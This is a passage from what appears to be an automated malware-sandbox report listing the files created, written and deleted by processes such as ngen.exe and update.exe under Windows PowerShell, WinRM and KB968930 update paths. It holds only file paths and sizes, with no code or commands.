C:\ea6d03fb84304f0031a48a\wsmplpxy.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\wevtfwd.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_escape_characters.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\powershell.exe.mui (0 bytes)
C:\ea6d03fb84304f0031a48a\types.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.consolehost.resources.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_type_operators.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\pwrshplugin.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_ref.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\registry.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\filesystem.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_windows_powershell_2.0.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\diagnostics.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\wtrinstaller.ico (0 bytes)
C:\ea6d03fb84304f0031a48a\about_scopes.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_data_sections.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_requirements.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\winrmprov.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.management.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_pipelines.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\pspluginwkr.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\winrs.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmanhttpconfig.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\about_aliases.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_switch.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_wmi_cmdlets.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\wsmwmipl.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.commands.utility.dll-help.xml (0 bytes)
C:\ea6d03fb84304f0031a48a\spmsg.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.graphicalhost.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\about_job_details.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\about_locations.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\winrshost.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_troubleshooting.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\profile.ps1 (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.security.dll (0 bytes)
C:\ea6d03fb84304f0031a48a\pscustomsetuputil.exe (0 bytes)
C:\ea6d03fb84304f0031a48a\wsman.format.ps1xml (0 bytes)
C:\ea6d03fb84304f0031a48a\about_remote_output.help.txt (0 bytes)
C:\ea6d03fb84304f0031a48a\microsoft.powershell.editor.dll (0 bytes)
The process ngen.exe:3900 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1184 bytes)
The process ngen.exe:3924 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1106 bytes)
The process ngen.exe:3916 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (784 bytes)
The process ngen.exe:3496 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1104 bytes)
The process ngen.exe:3908 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (486 bytes)
The process ngen.exe:3416 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (896 bytes)
The process ngen.exe:3536 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1114 bytes)
The process ngen.exe:3452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1186 bytes)
The process ngen.exe:3552 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (800 bytes)
The process ngen.exe:3576 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (826 bytes)
The process ngen.exe:3436 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (554 bytes)
The process ngen.exe:3940 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (746 bytes)
The process ngen.exe:3488 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (772 bytes)
The process ngen.exe:3932 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1428 bytes)
The process ngen.exe:3520 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1450 bytes)
The process ngen.exe:3528 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (770 bytes)
The process ngen.exe:3544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (468 bytes)
The process ngen.exe:3560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1140 bytes)
The process ngen.exe:3428 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (1220 bytes)
The process ngen.exe:3460 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (494 bytes)
The process ngen.exe:3376 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (596 bytes)
The process ngen.exe:3568 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (474 bytes)
The process ngen.exe:3444 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%WinDir%\Microsoft.NET\Framework\v2.0.50727\ngen.log (866 bytes)
The process update.exe:1716 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\SETBF.tmp (42 bytes)
%WinDir%\ocmsn.log (7791 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (16 bytes)
%System%\SET12.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (1281 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (12 bytes)
%System%\SETC.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (36 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (14022 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (950 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (4 bytes)
%System%\SET2D.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (17 bytes)
%System%\SET25.tmp (1281 bytes)
%System%\SET13.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (673 bytes)
%System%\SET20.tmp (2 bytes)
%System%\SET14.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (49 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (673 bytes)
%WinDir%\inf\SET32.tmp (38 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET68.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (3 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (38 bytes)
%System%\SET2A.tmp (2 bytes)
%WinDir%\inf\oem10.PNF (10040 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (10 bytes)
%System%\SET7.tmp (35 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\updspapi.dll (4145 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (601 bytes)
%WinDir%\msmqinst.log (5482 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk (2 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (15 bytes)
%System%\SET22.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (673 bytes)
%System%\spmsg.dll (14 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (7385 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (10 bytes)
%System%\GroupPolicy\Adm\SET1A.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (7 bytes)
%System%\SET2B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET94.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (11 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (40 bytes)
%WinDir%\inf\SET18.tmp (38 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (3 bytes)
%System%\SETE.tmp (22 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.inf (9162 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (7 bytes)
%System%\SET6.tmp (2 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (5 bytes)
%System%\wbem\SET4.tmp (4 bytes)
%System%\SET17.tmp (673 bytes)
%WinDir%\tabletoc.log (2313 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (6 bytes)
%System%\SETA.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SET93.tmp (7 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.txt (29 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (13 bytes)
%WinDir%\MedCtrOC.log (8910 bytes)
%System%\config\SYSTEM.LOG (5401 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (3 bytes)
%System%\SET27.tmp (601 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (9 bytes)
%System%\SET11.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (4185 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (24 bytes)
%System%\config (200 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (4 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (20 bytes)
%WinDir%\Help\SETC5.tmp (12287 bytes)
%System%\SET8.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (61 bytes)
%WinDir%\msgsocm.log (6541 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell ISE.lnk (4 bytes)
%System%\SETF.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (22 bytes)
%System%\SET10.tmp (2 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (7971 bytes)
%System%\SET26.tmp (2105 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (9 bytes)
%System%\SET21.tmp (35 bytes)
%System%\config\system (3267 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (20 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (24 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (31 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (673 bytes)
%WinDir%\SECD0.tmp (1897 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (27 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (2 bytes)
%WinDir%\imsins.log (3792 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (57 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (3 bytes)
%System%\SET16.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (3361 bytes)
%System%\WindowsPowerShell\v1.0\Examples\SETBC.tmp (15 bytes)
%System%\CatRoot2\dberr.txt (1031 bytes)
%System%\SETB.tmp (1281 bytes)
%System%\SET1F.tmp (1 bytes)
%WinDir%\iis6.log (139812 bytes)
%WinDir%\comsetup.log (48646 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (6 bytes)
%System%\spupdsvc.exe (23 bytes)
%System%\WindowsPowerShell\v1.0\SET5D.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET95.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SET65.tmp (22 bytes)
%System%\SET28.tmp (22 bytes)
%System%\SET5.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET92.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETA4.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET7E.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET45.tmp (2321 bytes)
%System%\WindowsPowerShell\v1.0\SETB4.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET9A.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET6E.tmp (1 bytes)
%System%\SET31.tmp (673 bytes)
%System%\SET2E.tmp (25 bytes)
%System%\WindowsPowerShell\v1.0\SETAC.tmp (10 bytes)
%WinDir%\$968930Uinstall_KB968930$\spuninst\spuninst.exe (2497 bytes)
%System%\WindowsPowerShell\v1.0\SET3A.tmp (601 bytes)
%System%\SET29.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET82.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET70.tmp (21 bytes)
%System%\WindowsPowerShell\v1.0\SETB5.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7A.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SETCD.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SET89.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET69.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SETA9.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SETAD.tmp (6 bytes)
%System%\SET2C.tmp (1281 bytes)
%System%\WindowsPowerShell\v1.0\SET8B.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC1.tmp (16 bytes)
%WinDir%\KB968930.log (242903 bytes)
%System%\SET15.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET4C.tmp (18248 bytes)
%WinDir%\ntdtcsetup.log (22997 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (1 bytes)
%System%\WindowsPowerShell\v1.0\SET61.tmp (438 bytes)
%WinDir%\inf\oem10.inf (673 bytes)
%System%\WindowsPowerShell\v1.0\SETAA.tmp (12 bytes)
%System%\SET24.tmp (7433 bytes)
%System%\WindowsPowerShell\v1.0\SETB1.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SET6F.tmp (5 bytes)
%System%\WindowsPowerShell\v1.0\SET52.tmp (10177 bytes)
%System%\WindowsPowerShell\v1.0\SET43.tmp (1425 bytes)
%System%\WindowsPowerShell\v1.0\SET8F.tmp (19 bytes)
%System%\WindowsPowerShell\v1.0\SET96.tmp (9 bytes)
%WinDir%\FaxSetup.log (53338 bytes)
%WinDir%\tsoc.log (79170 bytes)
%System%\WindowsPowerShell\v1.0\SET50.tmp (1425 bytes)
%WinDir%\KB968930xp.cat (59 bytes)
%System%\WindowsPowerShell\v1.0\SET7B.tmp (9 bytes)
%System%\winrm\0409\SET1D.tmp (601 bytes)
%System%\SETD.tmp (601 bytes)
%WinDir%\inf\SET19.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET47.tmp (18 bytes)
%System%\SET9.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET8A.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (16 bytes)
%System%\WindowsPowerShell\v1.0\SETC6.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SET6B.tmp (12 bytes)
%System%\winrm\0409\SET37.tmp (601 bytes)
%System%\WindowsPowerShell\v1.0\SETB9.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SETBB.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (15 bytes)
%System%\WindowsPowerShell\v1.0\SET60.tmp (10 bytes)
%System%\WindowsPowerShell\v1.0\SETCB.tmp (40 bytes)
%System%\WindowsPowerShell\v1.0\SET39.tmp (27 bytes)
%WinDir%\ocgen.log (71000 bytes)
%System%\WindowsPowerShell\v1.0\SET9E.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET40.tmp (1281 bytes)
%System%\SET2F.tmp (789 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (6 bytes)
%System%\WindowsPowerShell\v1.0\SET98.tmp (8 bytes)
%System%\WindowsPowerShell\v1.0\SET78.tmp (17 bytes)
%System%\WindowsPowerShell\v1.0\SET5C.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SET71.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET6A.tmp (23 bytes)
%System%\WindowsPowerShell\v1.0\SET8D.tmp (2 bytes)
%System%\SET30.tmp (14 bytes)
%System%\WindowsPowerShell\v1.0\SETA8.tmp (9 bytes)
%System%\WindowsPowerShell\v1.0\SETB8.tmp (6 bytes)
%System%\wbem\SET1E.tmp (4 bytes)
%System%\SET23.tmp (673 bytes)
%System%\WindowsPowerShell\v1.0\SET3B.tmp (24 bytes)
%WinDir%\netfxocm.log (9089 bytes)
%System%\WindowsPowerShell\v1.0\SET42.tmp (7 bytes)
%System%\WindowsPowerShell\v1.0\SETAB.tmp (3 bytes)
%System%\WindowsPowerShell\v1.0\SET77.tmp (10 bytes)
%WinDir%\inf\SET33.tmp (12 bytes)
%System%\WindowsPowerShell\v1.0\SET83.tmp (2 bytes)
%System%\WindowsPowerShell\v1.0\SET63.tmp (13 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (7 bytes)
The Trojan deletes the following file(s):
%System%\SETBF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET86.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB7.tmp (0 bytes)
%System%\SET12.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3E.tmp (0 bytes)
%WinDir%\_000003_.tmp.dll (0 bytes)
%System%\GroupPolicy\Adm\SET35.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETBA.tmp (0 bytes)
%System%\SETC.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET58.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET84.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET46.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET41.tmp (0 bytes)
%System%\_000002_.tmp.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCC.tmp (0 bytes)
%System%\wevtfwd.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET99.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA0.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET48.tmp (0 bytes)
%WinDir%\inf\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET74.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA5.tmp (0 bytes)
%System%\SET25.tmp (0 bytes)
%System%\SET13.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4E.tmp (0 bytes)
%System%\SET20.tmp (0 bytes)
%System%\SET14.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET59.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET57.tmp (0 bytes)
%WinDir%\inf\SET32.tmp (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBE.tmp (0 bytes)
%System%\SET7.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET80.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET34.tmp (0 bytes)
%System%\SET2A.tmp (0 bytes)
%WinDir%\inf\oem10.PNF (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET56.tmp (0 bytes)
%System%\WsmWmiPl.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET62.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET79.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA1.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET85.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET53.tmp (0 bytes)
%System%\GroupPolicy\Adm\WindowsRemoteShell.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET54.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB0.tmp (0 bytes)
%System%\winrm\0409\winrm.ini (0 bytes)
%System%\WindowsPowerShell\v1.0\SET66.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\en\SETC4.tmp (0 bytes)
%System%\winrscmd.dll (0 bytes)
%System%\SET2B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET76.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET73.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET6C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5A.tmp (0 bytes)
%System%\SET2E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC7.tmp (0 bytes)
%System%\wsmanhttpconfig.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\SET7D.tmp (0 bytes)
%System%\winrm.cmd (0 bytes)
%System%\SETE.tmp (0 bytes)
%System%\winrm.vbs (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA3.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET88.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5E.tmp (0 bytes)
%System%\SET6.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET36.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA6.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB3.tmp (0 bytes)
%System%\wbem\SET4.tmp (0 bytes)
%System%\SET17.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET64.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET67.tmp (0 bytes)
%System%\SETA.tmp (0 bytes)
%System%\SET22.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET51.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET75.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETA7.tmp (0 bytes)
%System%\SET27.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1B.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET72.tmp (0 bytes)
%System%\SET11.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCA.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET3F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4F.tmp (0 bytes)
%System%\WsmAuto.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETCE.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET97.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET81.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4B.tmp (0 bytes)
%System%\SET8.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET90.tmp (0 bytes)
%System%\SETF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9D.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETC9.tmp (0 bytes)
%System%\wbem\wsmAuto.mof (0 bytes)
%WinDir%\$968930Uinstall_KB968930$\SETBD.tmp (0 bytes)
%System%\wsmplpxy.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5F.tmp (0 bytes)
%System%\SET26.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET5B.tmp (0 bytes)
%System%\SET21.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET8E.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET38.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET49.tmp (0 bytes)
%System%\SET16.tmp (0 bytes)
%System%\GroupPolicy\Adm\windowsremotemanagement.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET9F.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4A.tmp (0 bytes)
%WinDir%\SECD0.tmp (0 bytes)
%System%\GroupPolicy\Adm\EventForwarding.adm (0 bytes)
%System%\WindowsPowerShell\v1.0\SET4D.tmp (0 bytes)
%System%\winrmprov.dll (0 bytes)
%System%\WindowsPowerShell\v1.0\SETAF.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET91.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET87.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET44.tmp (0 bytes)
%System%\GroupPolicy\Adm\SET1C.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SETB6.tmp (0 bytes)
%System%\wsmprovhost.exe (0 bytes)
%System%\WindowsPowerShell\v1.0\Modules\BitsTransfer\SETC2.tmp (0 bytes)
%System%\WindowsPowerShell\v1.0\SET55.tmp (0 bytes)
